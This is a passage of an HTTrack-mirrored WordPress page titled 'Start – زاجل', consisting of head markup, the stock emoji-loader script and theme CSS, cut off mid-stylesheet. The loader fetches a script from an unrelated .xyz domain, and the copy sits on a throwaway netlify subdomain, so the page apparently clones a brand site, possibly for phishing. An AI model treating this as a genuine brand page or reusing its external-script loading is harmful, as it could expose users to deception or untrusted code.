﻿<!DOCTYPE html>
<html lang="en-US">


<!-- Mirrored from zajil-zajil-d2356c.netlify.app/start/index.htm by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 05 Mar 2023 16:53:10 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">

	<title>Start &#8211; زاجل</title>
	<meta name='robots' content='max-image-preview:large'>
	<link rel="alternate" type="application/rss+xml" title="زاجل &raquo; Feed" href="../feed/index.html">
	<link rel="alternate" type="application/rss+xml" title="زاجل &raquo; Comments Feed"
		href="../comments/feed/index.html">
	<script>
		window._wpemojiSettings = { "baseUrl": "https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/", "ext": ".png", "svgUrl": "https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/", "svgExt": ".svg", "source": { "concatemoji": "https:\/\/aerzs-iletuues-ami.xyz\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1" } };
		/*! This file is auto-generated */
		!function (e, a, t) { var n, r, o, i = a.createElement("canvas"), p = i.getContext && i.getContext("2d"); function s(e, t) { var a = String.fromCharCode, e = (p.clearRect(0, 0, i.width, i.height), p.fillText(a.apply(this, e), 0, 0), i.toDataURL()); return p.clearRect(0, 0, i.width, i.height), p.fillText(a.apply(this, t), 0, 0), e === i.toDataURL() } function c(e) { var t = a.createElement("script"); t.src = e, t.defer = t.type = "text/javascript", a.getElementsByTagName("head")[0].appendChild(t) } for (o = Array("flag", "emoji"), t.supports = { everything: !0, everythingExceptFlag: !0 }, r = 0; r < o.length; r++)t.supports[o[r]] = function (e) { if (p && p.fillText) switch (p.textBaseline = "top", p.font = "600 32px Arial", e) { case "flag": return s([127987, 65039, 8205, 9895, 65039], [127987, 65039, 8203, 9895, 65039]) ? !1 : !s([55356, 56826, 55356, 56819], [55356, 56826, 8203, 55356, 56819]) && !s([55356, 57332, 56128, 56423, 56128, 56418, 56128, 56421, 56128, 56430, 56128, 56423, 56128, 56447], [55356, 57332, 8203, 56128, 56423, 8203, 56128, 56418, 8203, 56128, 56421, 8203, 56128, 56430, 8203, 56128, 56423, 8203, 56128, 56447]); case "emoji": return !s([129777, 127995, 8205, 129778, 127999], [129777, 127995, 8203, 129778, 127999]) }return !1 }(o[r]), t.supports.everything = t.supports.everything && t.supports[o[r]], "flag" !== o[r] && (t.supports.everythingExceptFlag = t.supports.everythingExceptFlag && t.supports[o[r]]); t.supports.everythingExceptFlag = t.supports.everythingExceptFlag && !t.supports.flag, t.DOMReady = !1, t.readyCallback = function () { t.DOMReady = !0 }, t.supports.everything || (n = function () { t.readyCallback() }, a.addEventListener ? (a.addEventListener("DOMContentLoaded", n, !1), e.addEventListener("load", n, !1)) : (e.attachEvent("onload", n), a.attachEvent("onreadystatechange", function () { "complete" === a.readyState && t.readyCallback() })), (e = t.source || {}).concatemoji ? c(e.concatemoji) : e.wpemoji && e.twemoji && (c(e.twemoji), c(e.wpemoji))) }(window, document, window._wpemojiSettings);
	</script>
	<style>
		img.wp-smiley,
		img.emoji {
			display: inline !important;
			border: none !important;
			box-shadow: none !important;
			height: 1em !important;
			width: 1em !important;
			margin: 0 0.07em !important;
			vertical-align: -0.1em !important;
			background: none !important;
			padding: 0 !important;
		}
	</style>
	<link rel='stylesheet' id='astra-theme-css-css'
		href='../wp-content/themes/astra/assets/css/minified/main.min05da.css?ver=4.0.2' media='all'>
	<style id='astra-theme-css-inline-css'>
		:root {
			--ast-container-default-xlg-padding: 3em;
			--ast-container-default-lg-padding: 3em;
			--ast-container-default-slg-padding: 2em;
			--ast-container-default-md-padding: 3em;
			--ast-container-default-sm-padding: 3em;
			--ast-container-default-xs-padding: 2.4em;
			--ast-container-default-xxs-padding: 1.8em;
			--ast-code-block-background: #EEEEEE;
			--ast-comment-inputs-background: #FAFAFA;
		}

		html {
			font-size: 93.75%;
		}

		a {
			color: var(--ast-global-color-0);
		}

		a:hover,
		a:focus {
			color: var(--ast-global-color-1);
		}

		body,
		button,
		input,
		select,
		textarea,
		.ast-button,
		.ast-custom-button {
			font-family: -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Oxygen-Sans, Ubuntu, Cantarell, Helvetica Neue, sans-serif;
			font-weight: inherit;
			font-size: 15px;
			font-size: 1rem;
			line-height: 1.6em;
		}

		blockquote {
			color: var(--ast-global-color-3);
		}

		h1,
		.entry-content h1,
		h2,
		.entry-content h2,
		h3,
		.entry-content h3,
		h4,
		.entry-content h4,
		h5,
		.entry-content h5,
		h6,
		.entry-content h6,
		.site-title,
		.site-title a {
			font-weight: 600;
		}

		.site-title {
			font-size: 35px;
			font-size: 2.3333333333333rem;
			display: block;
		}

		.site-header .site-description {
			font-size: 15px;
			font-size: 1rem;
			display: block;
		}

		.entry-title {
			font-size: 30px;
			font-size: 2rem;
		}

		h1,
		.entry-content h1 {
			font-size: 40px;
			font-size: 2.6666666666667rem;
			font-weight: 600;
			line-height: 1.4em;
		}

		h2,
		.entry-content h2 {
			font-size: 30px;
			font-size: 2rem;
			font-weight: 600;
			line-height: 1.25em;
		}

		h3,
		.entry-content h3 {
			font-size: 25px;
			font-size: 1.6666666666667rem;
			font-weight: 600;
			line-height: 1.2em;
		}

		h4,
		.entry-content h4 {
			font-size: 20px;
			font-size: 1.3333333333333rem;
			line-height: 1.2em;
			font-weight: 600;
		}

		h5,
		.entry-content h5 {
			font-size: 18px;
			font-size: 1.2rem;
			line-height: 1.2em;
			font-weight: 600;
		}

		h6,
		.entry-content h6 {
			font-size: 15px;
			font-size: 1rem;
			line-height: 1.25em;
			font-weight: 600;
		}

		::selection {
			background-color: var(--ast-global-color-0);
			color: #ffffff;
		}

		body,
		h1,
		.entry-title a,
		.entry-content h1,
		h2,
		.entry-content h2,
		h3,
		.entry-content h3,
		h4,
		.entry-content h4,
		h5,
		.entry-content h5,
		h6,
		.entry-content h6 {
			color: var(--ast-global-color-3);
		}

		.tagcloud a:hover,
		.tagcloud a:focus,
		.tagcloud a.current-item {
			color: #ffffff;
			border-color: var(--ast-global-color-0);
			background-color: var(--ast-global-color-0);
		}

		input:focus,
		input[type="text"]:focus,
		input[type="email"]:focus,
		input[type="url"]:focus,
		input[type="password"]:focus,
		input[type="reset"]:focus,
		input[type="search"]:focus,
		textarea:focus {
			border-color: var(--ast-global-color-0);
		}

		input[type="radio"]:checked,
		input[type=reset],
		input[type="checkbox"]:checked,
		input[type="checkbox"]:hover:checked,
		input[type="checkbox"]:focus:checked,
		input[type=range]::-webkit-slider-thumb {
			border-color: var(--ast-global-color-0);
			background-color: var(--ast-global-color-0);
			box-shadow: none;
		}

		.site-footer a:hover+.post-count,
		.site-footer a:focus+.post-count {
			background: var(--ast-global-color-0);
			border-color: var(--ast-global-color-0);
		}

		.single .nav-links .nav-previous,
		.single .nav-links .nav-next {
			color: var(--ast-global-color-0);
		}

		.entry-meta,
		.entry-meta * {
			line-height: 1.45;
			color: var(--ast-global-color-0);
		}

		.entry-meta a:hover,
		.entry-meta a:hover *,
		.entry-meta a:focus,
		.entry-meta a:focus *,
		.page-links>.page-link,
		.page-links .page-link:hover,
		.post-navigation a:hover {
			color: var(--ast-global-color-1);
		}

		#cat option,
		.secondary .calendar_wrap thead a,
		.secondary .calendar_wrap thead a:visited {
			color: var(--ast-global-color-0);
		}

		.secondary .calendar_wrap #today,
		.ast-progress-val span {
			background: var(--ast-global-color-0);
		}

		.secondary a:hover+.post-count,
		.secondary a:focus+.post-count {
			background: var(--ast-global-color-0);
			border-color: var(--ast-global-color-0);
		}

		.calendar_wrap #today>a {
			color: #ffffff;
		}

		.page-links .page-link,
		.single .post-navigation a {
			color: var(--ast-global-color-0);
		}

		.ast-archive-title {
			color: var(--ast-global-color-2);
		}

		.widget-title {
			font-size: 21px;
			font-size: 1.4rem;
			color: var(--ast-global-color-2);
		}

		.ast-single-post .entry-content a,
		.ast-comment-content a:not(.ast-comment-edit-reply-wrap a) {
			text-decoration: underline;
		}

		.ast-single-post .wp-block-button .wp-block-button__link,
		.ast-single-post .elementor-button-wrapper .elementor-button,
		.ast-single-post .entry-content .uagb-tab a,
		.ast-single-post .entry-content .uagb-ifb-cta a,
		.ast-single-post .entry-content .wp-block-uagb-buttons a,
		.ast-single-post .entry-content .uabb-module-content a,
		.ast-single-post .entry-content .uagb-post-grid a,
		.ast-single-post .entry-content .uagb-timeline a,
		.ast-single-post .entry-content .uagb-toc__wrap a,
		.ast-single-post .entry-content .uagb-taxomony-box a,
		.ast-single-post .entry-content .woocommerce a,
		.entry-content .wp-block-latest-posts>li>a,
		.ast-single-post .entry-content .wp-block-file__button {
			text-decoration: none;
		}

		.ast-logo-title-inline .site-logo-img {
			padding-right: 1em;
		}

		.ast-page-builder-template .hentry {
			margin: 0;
		}

		.ast-page-builder-template .site-content>.ast-container {
			max-width: 100%;
			padding: 0;
		}

		.ast-page-builder-template .site-content #primary {
			padding: 0;
			margin: 0;
		}

		.ast-page-builder-template .no-results {
			text-align: center;
			margin: 4em auto;
		}

		.ast-page-builder-template .ast-pagination {
			padding: 2em;
		}

		.ast-page-builder-template .entry-header.ast-no-title.ast-no-thumbnail {
			margin-top: 0;
		}

		.ast-page-builder-template .entry-header.ast-header-without-markup {
			margin-top: 0;
			margin-bottom: 0;
		}

		.ast-page-builder-template .entry-header.ast-no-title.ast-no-meta {
			margin-bottom: 0;
		}

		.ast-page-builder-template.single .post-navigation {
			padding-bottom: 2em;
		}

		.ast-page-builder-template.single-post .site-content>.ast-container {
			max-width: 100%;
		}

		.ast-page-builder-template .entry-header {
			margin-top: 2em;
			margin-left: auto;
			margin-right: auto;
		}

		.ast-page-builder-template .ast-archive-description {
			margin: 2em auto 0;
			padding-left: 20px;
			padding-right: 20px;
		}

		.ast-page-builder-template .ast-row {
			margin-left: 0;
			margin-right: 0;
		}

		.single.ast-page-builder-template .entry-header+.entry-content {
			margin-bottom: 2em;
		}

		@media(min-width: 921px) {

			.ast-page-builder-template.archive.ast-right-sidebar .ast-row article,
			.ast-page-builder-template.archive.ast-left-sidebar .ast-row article {
				padding-left: 0;
				padding-right: 0;
			}
		}

		@media (max-width:921px) {
			#ast-desktop-header {
				display: none;
			}
		}

		@media (min-width:921px) {
			#ast-mobile-header {
				display: none;
			}
		}

		.wp-block-buttons.aligncenter {
			justify-content: center;
		}

		@media (max-width:921px) {

			.ast-theme-transparent-header #primary,
			.ast-theme-transparent-header #secondary {
				padding: 0;
			}
		}

		@media (max-width:921px) {
			.ast-plain-container.ast-no-sidebar #primary {
				padding: 0;
			}
		}

		.ast-plain-container.ast-no-sidebar #primary {
			margin-top: 0;
			margin-bottom: 0;
		}

		.wp-block-button.is-style-outline .wp-block-button__link {
			border-color: var(--ast-global-color-0);
		}

		.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color),
		.wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color) {
			color: var(--ast-global-color-0);
		}

		.wp-block-button.is-style-outline .wp-block-button__link:hover,
		.wp-block-button.is-style-outline .wp-block-button__link:focus {
			color: #ffffff !important;
			background-color: var(--ast-global-color-1);
			border-color: var(--ast-global-color-1);
		}

		.post-page-numbers.current .page-link,
		.ast-pagination .page-numbers.current {
			color: #ffffff;
			border-color: var(--ast-global-color-0);
			background-color: var(--ast-global-color-0);
			border-radius: 2px;
		}

		h1.widget-title {
			font-weight: 600;
		}

		h2.widget-title {
			font-weight: 600;
		}

		h3.widget-title {
			font-weight: 600;
		}

		#page {
			display: flex;
			flex-direction: column;
			min-height: 100vh;
		}

		.ast-404-layout-1 h1.page-title {
			color: var(--ast-global-color-2);
		}

		.single .post-navigation a {
			line-height: 1em;
			height: inherit;
		}

		.error-404 .page-sub-title {
			font-size: 1.5rem;
			font-weight: inherit;
		}

		.search .site-content .content-area .search-form {
			margin-bottom: 0;
		}

		#page .site-content {
			flex-grow: 1;
		}

		.widget {
			margin-bottom: 3.5em;
		}

		#secondary li {
			line-height: 1.5em;
		}

		#secondary .wp-block-group h2 {
			margin-bottom: 0.7em;
		}

		#secondary h2 {
			font-size: 1.7rem;
		}

		.ast-separate-container .ast-article-post,
		.ast-separate-container .ast-article-single,
		.ast-separate-container .ast-comment-list li.depth-1,
		.ast-separate-container .comment-respond {
			padding: 3em;
		}

		.ast-separate-container .ast-comment-list li.depth-1,
		.hentry {
			margin-bottom: 2em;
		}

		.ast-separate-container .ast-archive-description,
		.ast-separate-container .ast-author-box {
			background-color: var(--ast-global-color-5);
			border-bottom: 1px solid var(--ast-border-color);
		}

		.ast-separate-container .comments-title {
			padding: 2em 2em 0 2em;
		}

		.ast-page-builder-template .comment-form-textarea,
		.ast-comment-formwrap .ast-grid-common-col {
			padding: 0;
		}

		.ast-comment-formwrap {
			padding: 0 20px;
			display: inline-flex;
			column-gap: 20px;
		}

		.archive.ast-page-builder-template .entry-header {
			margin-top: 2em;
		}

		.ast-page-builder-template .ast-comment-formwrap {
			width: 100%;
		}

		.entry-title {
			margin-bottom: 0.5em;
		}

		.ast-archive-description p {
			font-size: inherit;
			font-weight: inherit;
			line-height: inherit;
		}

		@media (min-width:921px) {

			.ast-left-sidebar.ast-page-builder-template #secondary,
			.archive.ast-right-sidebar.ast-page-builder-template .site-main {
				padding-left: 20px;
				padding-right: 20px;
			}
		}

		@media (max-width:544px) {
			.ast-comment-formwrap.ast-row {
				column-gap: 10px;
				display: inline-block;
			}

			#ast-commentform .ast-grid-common-col {
				position: relative;
				width: 100%;
			}
		}

		@media (min-width:1201px) {

			.ast-separate-container .ast-article-post,
			.ast-separate-container .ast-article-single,
			.ast-separate-container .ast-author-box,
			.ast-separate-container .ast-404-layout-1,
			.ast-separate-container .no-results {
				padding: 3em;
			}
		}

		@media (max-width:921px) {

			.ast-separate-container #primary,
			.ast-separate-container #secondary {
				padding: 1.5em 0;
			}

			#primary,
			#secondary {
				padding: 1.5em 0;
				margin: 0;
			}

			.ast-left-sidebar #content>.ast-container {
				display: flex;
				flex-direction: column-reverse;
				width: 100%;
			}
		}

		@media (min-width:922px) {

			.ast-separate-container.ast-right-sidebar #primary,
			.ast-separate-container.ast-left-sidebar #primary {
				border: 0;
			}

			.search-no-results.ast-separate-container #primary {
				margin-bottom: 4em;
			}
		}

		.wp-block-button .wp-block-button__link {
			color: #ffffff;
		}

		.wp-block-button .wp-block-button__link:hover,
		.wp-block-button .wp-block-button__link:focus {
			color: #ffffff;
			background-color: var(--ast-global-color-1);
			border-color: var(--ast-global-color-1);
		}

		.elementor-widget-heading h1.elementor-heading-title {
			line-height: 1.4em;
		}

		.elementor-widget-heading h2.elementor-heading-title {
			line-height: 1.25em;
		}

		.elementor-widget-heading h3.elementor-heading-title {
			line-height: 1.2em;
		}

		.elementor-widget-heading h4.elementor-heading-title {
			line-height: 1.2em;
		}

		.elementor-widget-heading h5.elementor-heading-title {
			line-height: 1.2em;
		}

		.elementor-widget-heading h6.elementor-heading-title {
			line-height: 1.25em;
		}

		.wp-block-button .wp-block-button__link,
		.wp-block-search .wp-block-search__button,
		body .wp-block-file .wp-block-file__button {
			border-color: var(--ast-global-color-0);
			background-color: var(--ast-global-color-0);
			color: #ffffff;
			font-family: inherit;
			font-weight: inherit;
			line-height: 1em;
			border-radius: 2px;
			padding-top: 15px;
			padding-right: 30px;
			padding-bottom: 15px;
			padding-left: 30px;
		}

		@media (max-width:921px) {

			.wp-block-button .wp-block-button__link,
			.wp-block-search .wp-block-search__button,
			body .wp-block-file .wp-block-file__button {
				padding-top: 14px;
				padding-right: 28px;
				padding-bottom: 14px;
				padding-left: 28px;
			}
		}

		@media (max-width:544px) {

			.wp-block-button .wp-block-button__link,
			.wp-block-search .wp-block-search__button,
			body .wp-block-file .wp-block-file__button {
				padding-top: 12px;
				padding-right: 24px;
				padding-bottom: 12px;
				padding-left: 24px;
			}
		}

		.menu-toggle,
		button,
		.ast-button,
		.ast-custom-button,
		.button,
		input#submit,
		input[type="button"],
		input[type="submit"],
		input[type="reset"],
		form[CLASS*="wp-block-search__"].wp-block-search .wp-block-search__inside-wrapper .wp-block-search__button,
		body .wp-block-file .wp-block-file__button,
		.search .search-submit {
			border-style: solid;
			border-top-width: 0;
			border-right-width: 0;
			border-left-width: 0;
			border-bottom-width: 0;
			color: #ffffff;
			border-color: var(--ast-global-color-0);
			background-color: var(--ast-global-color-0);
			border-radius: 2px;
			padding-top: 15px;
			padding-right: 30px;
			padding-bottom: 15px;
			padding-left: 30px;
			font-family: inherit;
			font-weight: inherit;
			line-height: 1em;
		}

		button:focus,
		.menu-toggle:hover,
		button:hover,
		.ast-button:hover,
		.ast-custom-button:hover .button:hover,
		.ast-custom-button:hover,
		input[type=reset]:hover,
		input[type=reset]:focus,
		input#submit:hover,
		input#submit:focus,
		input[type="button"]:hover,
		input[type="button"]:focus,
		input[type="submit"]:hover,
		input[type="submit"]:focus,
		form[CLASS*="wp-block-search__"].wp-block-search .wp-block-search__inside-wrapper .wp-block-search__button:hover,
		form[CLASS*="wp-block-search__"].wp-block-search .wp-block-search__inside-wrapper .wp-block-search__button:focus,
		body .wp-block-file .wp-block-file__button:hover,
		body .wp-block-file .wp-block-file__button:focus {
			color: #ffffff;
			background-color: var(--ast-global-color-1);
			border-color: var(--ast-global-color-1);
		}

		form[CLASS*="wp-block-search__"].wp-block-search .wp-block-search__inside-wrapper .wp-block-search__button.has-icon {
			padding-top: calc(15px - 3px);
			padding-right: calc(30px - 3px);
			padding-bottom: calc(15px - 3px);
			padding-left: calc(30px - 3px);
		}

		@media (min-width:544px) {
			.ast-container {
				max-width: 100%;
			}
		}

		@media (max-width:544px) {

			.ast-separate-container .ast-article-post,
			.ast-separate-container .ast-article-single,
			.ast-separate-container .comments-title,
			.ast-separate-container .ast-archive-description {
				padding: 1.5em 1em;
			}

			.ast-separate-container #content .ast-container {
				padding-left: 0.54em;
				padding-right: 0.54em;
			}

			.ast-separate-container .ast-comment-list li.depth-1 {
				padding: 1.5em 1em;
				margin-bottom: 1.5em;
			}

			.ast-separate-container .ast-comment-list .bypostauthor {
				padding: .5em;
			}

			.ast-search-menu-icon.ast-dropdown-active .search-field {
				width: 170px;
			}

			.menu-toggle,
			button,
			.ast-button,
			.button,
			input#submit,
			input[type="button"],
			input[type="submit"],
			input[type="reset"] {
				padding-top: 12px;
				padding-right: 24px;
				padding-bottom: 12px;
				padding-left: 24px;
			}
		}

		@media (max-width:921px) {

			.menu-toggle,
			button,
			.ast-button,
			.button,
			input#submit,
			input[type="button"],
			input[type="submit"],
			input[type="reset"] {
				padding-top: 14px;
				padding-right: 28px;
				padding-bottom: 14px;
				padding-left: 28px;
			}

			.ast-mobile-header-stack .main-header-bar .ast-search-menu-icon {
				display: inline-block;
			}

			.ast-header-break-point.ast-header-custom-item-outside .ast-mobile-header-stack .main-header-bar .ast-search-icon {
				margin: 0;
			}

			.ast-comment-avatar-wrap img {
				max-width: 2.5em;
			}

			.ast-separate-container .ast-comment-list li.depth-1 {
				padding: 1.5em 2.14em;
			}

			.ast-separate-container .comment-respond {
				padding: 2em 2.14em;
			}

			.ast-comment-meta {
				padding: 0 1.8888em 1.3333em;
			}
		}

		.ast-separate-container {
			background-color: var(--ast-global-color-4);
			;
		}

		@media (max-width:921px) {
			.site-title {
				display: block;
			}

			.site-header .site-description {
				display: none;
			}

			.entry-title {
				font-size: 30px;
			}

			h1,
			.entry-content h1 {
				font-size: 30px;
			}

			h2,
			.entry-content h2 {
				font-size: 25px;
			}

			h3,
			.entry-content h3 {
				font-size: 20px;
			}
		}

		@media (max-width:544px) {
			.site-title {
				display: block;
			}

			.site-header .site-description {
				display: none;
			}

			.entry-title {
				font-size: 30px;
			}

			h1,
			.entry-content h1 {
				font-size: 30px;
			}

			h2,
			.entry-content h2 {
				font-size: 25px;
			}

			h3,
			.entry-content h3 {
				font-size: 20px;
			}
		}

		@media (max-width:921px) {
			html {
				font-size: 85.5%;
			}
		}

		@media (max-width:544px) {
			html {
				font-size: 85.5%;
			}
		}

		@media (min-width:922px) {
			.ast-container {
				max-width: 1240px;
			}
		}

		@media (min-width:922px) {
			.site-content .ast-container {
				display: flex;
			}
		}

		@media (max-width:921px) {
			.site-content .ast-container {
				flex-direction: column;
			}
		}

		@media (min-width:922px) {

			.main-header-menu .sub-menu .menu-item.ast-left-align-sub-menu:hover>.sub-menu,
			.main-header-menu .sub-menu .menu-item.ast-left-align-sub-menu.focus>.sub-menu {
				margin-left: -0px;
			}
		}

		blockquote,
		cite {
			font-style: initial;
		}

		.wp-block-file {
			display: flex;
			align-items: center;
			flex-wrap: wrap;
			justify-content: space-between;
		}

		.wp-block-pullquote {
			border: none;
		}

		.wp-block-pullquote blockquote::before {
			content: "\201D";
			font-family: "Helvetica", sans-serif;
			display: flex;
			transform: rotate(180deg);
			font-size: 6rem;
			font-style: normal;
			line-height: 1;
			font-weight: bold;
			align-items: center;
			justify-content: center;
		}

		.has-text-align-right>blockquote::before {
			justify-content: flex-start;
		}

		.has-text-align-left>blockquote::before {
			justify-content: flex-end;
		}

		figure.wp-block-pullquote.is-style-solid-color blockquote {
			max-width: 100%;
			text-align: inherit;
		}

		html body {
			--wp--custom--ast-default-block-top-padding: 3em;
			--wp--custom--ast-default-block-right-padding: 3em;
			--wp--custom--ast-default-block-bottom-padding: 3em;
			--wp--custom--ast-default-block-left-padding: 3em;
			--wp--custom--ast-container-width: 1200px;
			--wp--custom--ast-content-width-size: 1200px;
			--wp--custom--ast-wide-width-size: calc(1200px + var(--wp--custom--ast-default-block-left-padding) + var(--wp--custom--ast-default-block-right-padding));
		}

		.ast-narrow-container {
			--wp--custom--ast-content-width-size: 750px;
			--wp--custom--ast-wide-width-size: 750px;
		}

		@media(max-width: 921px) {
			html body {
				--wp--custom--ast-default-block-top-padding: 3em;
				--wp--custom--ast-default-block-right-padding: 2em;
				--wp--custom--ast-default-block-bottom-padding: 3em;
				--wp--custom--ast-default-block-left-padding: 2em;
			}
		}

		@media(max-width: 544px) {
			html body {
				--wp--custom--ast-default-block-top-padding: 3em;
				--wp--custom--ast-default-block-right-padding: 1.5em;
				--wp--custom--ast-default-block-bottom-padding: 3em;
				--wp--custom--ast-default-block-left-padding: 1.5em;
			}
		}

		.entry-content>.wp-block-group,
		.entry-content>.wp-block-cover,
		.entry-content>.wp-block-columns {
			padding-top: var(--wp--custom--ast-default-block-top-padding);
			padding-right: var(--wp--custom--ast-default-block-right-padding);
			padding-bottom: var(--wp--custom--ast-default-block-bottom-padding);
			padding-left: var(--wp--custom--ast-default-block-left-padding);
		}

		.ast-plain-container.ast-no-sidebar .entry-content>.alignfull,
		.ast-page-builder-template .ast-no-sidebar .entry-content>.alignfull {
			margin-left: calc(-50vw + 50%);
			margin-right: calc(-50vw + 50%);
			max-width: 100vw;
			width: 100vw;
		}

		.ast-plain-container.ast-no-sidebar .entry-content .alignfull .alignfull,
		.ast-page-builder-template.ast-no-sidebar .entry-content .alignfull .alignfull,
		.ast-plain-container.ast-no-sidebar .entry-content .alignfull .alignwide,
		.ast-page-builder-template.ast-no-sidebar .entry-content .alignfull .alignwide,
		.ast-plain-container.ast-no-sidebar .entry-content .alignwide .alignfull,
		.ast-page-builder-template.ast-no-sidebar .entry-content .alignwide .alignfull,
		.ast-plain-container.ast-no-sidebar .entry-content .alignwide .alignwide,
		.ast-page-builder-template.ast-no-sidebar .entry-content .alignwide .alignwide,
		.ast-plain-container.ast-no-sidebar .entry-content .wp-block-column .alignfull,
		.ast-page-builder-template.ast-no-sidebar .entry-content .wp-block-column .alignfull,
		.ast-plain-container.ast-no-sidebar .entry-content .wp-block-column .alignwide,
		.ast-page-builder-template.ast-no-sidebar .entry-content .wp-block-column .alignwide {
			margin-left: auto;
			margin-right: auto;
			width: 100%;
		}

		[ast-blocks-layout] .wp-block-separator:not(.is-style-dots) {
			height: 0;
		}

		[ast-blocks-layout] .wp-block-separator {
			margin: 20px auto;
		}

		[ast-blocks-layout] .wp-block-separator:not(.is-style-wide):not(.is-style-dots) {
			max-width: 100px;
		}

		[ast-blocks-layout] .wp-block-separator.has-background {
			padding: 0;
		}

		.entry-content[ast-blocks-layout]>* {
			max-width: var(--wp--custom--ast-content-width-size);
			margin-left: auto;
			margin-right: auto;
		}

		.entry-content[ast-blocks-layout]>.alignwide {
			max-width: var(--wp--custom--ast-wide-width-size);
		}

		.entry-content[ast-blocks-layout] .alignfull {
			max-width: none;
		}

		.entry-content .wp-block-columns {
			margin-bottom: 0;
		}

		blockquote {
			margin: 1.5em;
			border: none;
		}

		.wp-block-quote:not(.has-text-align-right):not(.has-text-align-center) {
			border-left: 5px solid rgba(0, 0, 0, 0.05);
		}

		.has-text-align-right>blockquote,
		blockquote.has-text-align-right {
			border-right: 5px solid rgba(0, 0, 0, 0.05);
		}

		.has-text-align-left>blockquote,
		blockquote.has-text-align-left {
			border-left: 5px solid rgba(0, 0, 0, 0.05);
		}

		.wp-block-site-tagline,
		.wp-block-latest-posts .read-more {
			margin-top: 15px;
		}

		.wp-block-loginout p label {
			display: block;
		}

		.wp-block-loginout p:not(.login-remember):not(.login-submit) input {
			width: 100%;
		}

		.wp-block-loginout input:focus {
			border-color: transparent;
		}

		.wp-block-loginout input:focus {
			outline: thin dotted;
		}

		.entry-content .wp-block-media-text .wp-block-media-text__content {
			padding: 0 0 0 8%;
		}

		.entry-content .wp-block-media-text.has-media-on-the-right .wp-block-media-text__content {
			padding: 0 8% 0 0;
		}

		.entry-content .wp-block-media-text.has-background .wp-block-media-text__content {
			padding: 8%;
		}

		.entry-content .wp-block-cover:not([class*="background-color"]) .wp-block-cover__inner-container,
		.entry-content .wp-block-cover:not([class*="background-color"]) .wp-block-cover-image-text,
		.entry-content .wp-block-cover:not([class*="background-color"]) .wp-block-cover-text,
		.entry-content .wp-block-cover-image:not([class*="background-color"]) .wp-block-cover__inner-container,
		.entry-content .wp-block-cover-image:not([class*="background-color"]) .wp-block-cover-image-text,
		.entry-content .wp-block-cover-image:not([class*="background-color"]) .wp-block-cover-text {
			color: var(--ast-global-color-5);
		}

		.wp-block-loginout .login-remember input {
			width: 1.1rem;
			height: 1.1rem;
			margin: 0 5px 4px 0;
			vertical-align: middle;
		}

		.wp-block-latest-posts>li>*:first-child,
		.wp-block-latest-posts:not(.is-grid)>li:first-child {
			margin-top: 0;
		}

		.wp-block-search__inside-wrapper .wp-block-search__input {
			padding: 0 10px;
			color: var(--ast-global-color-3);
			background: var(--ast-global-color-5);
			border-color: var(--ast-border-color);
		}

		.wp-block-latest-posts .read-more {
			margin-bottom: 1.5em;
		}

		.wp-block-search__no-button .wp-block-search__inside-wrapper .wp-block-search__input {
			padding-top: 5px;
			padding-bottom: 5px;
		}

		.wp-block-latest-posts .wp-block-latest-posts__post-date,
		.wp-block-latest-posts .wp-block-latest-posts__post-author {
			font-size: 1rem;
		}

		.wp-block-latest-posts>li>*,
		.wp-block-latest-posts:not(.is-grid)>li {
			margin-top: 12px;
			margin-bottom: 12px;
		}

		.ast-page-builder-template .entry-content[ast-blocks-layout]>*,
		.ast-page-builder-template .entry-content[ast-blocks-layout]>.alignfull>* {
			max-width: none;
		}

		.ast-page-builder-template .entry-content[ast-blocks-layout]>.alignwide>* {
			max-width: var(--wp--custom--ast-wide-width-size);
		}

		.ast-page-builder-template .entry-content[ast-blocks-layout]>.inherit-container-width>*,
		.ast-page-builder-template .entry-content[ast-blocks-layout]>*>*,
		.entry-content[ast-blocks-layout]>.wp-block-cover .wp-block-cover__inner-container {
			max-width: var(--wp--custom--ast-content-width-size);
			margin-left: auto;
			margin-right: auto;
		}

		.entry-content[ast-blocks-layout] .wp-block-cover:not(.alignleft):not(.alignright) {
			width: auto;
		}

		@media(max-width: 1200px) {

			.ast-separate-container .entry-content>.alignfull,
			.ast-separate-container .entry-content[ast-blocks-layout]>.alignwide,
			.ast-plain-container .entry-content[ast-blocks-layout]>.alignwide,
			.ast-plain-container .entry-content .alignfull {
				margin-left: calc(-1 * min(var(--ast-container-default-xlg-padding), 20px));
				margin-right: calc(-1 * min(var(--ast-container-default-xlg-padding), 20px));
			}
		}

		@media(min-width: 1201px) {
			.ast-separate-container .entry-content>.alignfull {
				margin-left: calc(-1 * var(--ast-container-default-xlg-padding));
				margin-right: calc(-1 * var(--ast-container-default-xlg-padding));
			}

			.ast-separate-container .entry-content[ast-blocks-layout]>.alignwide,
			.ast-plain-container .entry-content[ast-blocks-layout]>.alignwide {
				margin-left: calc(-1 * var(--wp--custom--ast-default-block-left-padding));
				margin-right: calc(-1 * var(--wp--custom--ast-default-block-right-padding));
			}
		}

		@media(min-width: 921px) {

			.ast-separate-container .entry-content .wp-block-group.alignwide:not(.inherit-container-width)> :where(:not(.alignleft):not(.alignright)),
			.ast-plain-container .entry-content .wp-block-group.alignwide:not(.inherit-container-width)> :where(:not(.alignleft):not(.alignright)) {
				max-width: calc(var(--wp--custom--ast-content-width-size) + 80px);
			}

			.ast-plain-container.ast-right-sidebar .entry-content[ast-blocks-layout] .alignfull,
			.ast-plain-container.ast-left-sidebar .entry-content[ast-blocks-layout] .alignfull {
				margin-left: -60px;
				margin-right: -60px;
			}
		}

		@media(min-width: 544px) {
			.entry-content>.alignleft {
				margin-right: 20px;
			}

			.entry-content>.alignright {
				margin-left: 20px;
			}
		}

		@media (max-width:544px) {
			.wp-block-columns .wp-block-column:not(:last-child) {
				margin-bottom: 20px;
			}

			.wp-block-latest-posts {
				margin: 0;
			}
		}

		@media(max-width: 600px) {

			.entry-content .wp-block-media-text .wp-block-media-text__content,
			.entry-content .wp-block-media-text.has-media-on-the-right .wp-block-media-text__content {
				padding: 8% 0 0;
